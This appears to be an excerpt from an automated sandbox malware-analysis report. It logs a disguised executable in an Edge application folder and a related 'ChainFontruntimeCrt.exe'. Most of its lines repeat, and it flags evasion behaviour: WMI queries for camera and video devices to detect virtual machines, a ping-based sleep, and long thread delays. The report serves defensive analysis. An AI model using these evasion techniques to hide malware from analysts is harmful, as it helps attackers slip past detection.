                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                                    Malware Analysis System Evasion

                                    barindex
                                    Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                    Uses ping.exe to sleep
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeMemory allocated: 930000 memory reserve | memory write watchJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeMemory allocated: 1A750000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeMemory allocated: D90000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeMemory allocated: 1AA20000 memory reserve | memory write watchJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 600000Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 599890Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 599781Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 599670Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 599547Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 599438Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 599313Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 599188Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 599063Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 598953Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 598844Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 598719Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 598609Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 598500Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 598391Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 598281Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 598125Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 597813Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 3600000Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 597406Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 597016Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 596453Jump to behavior
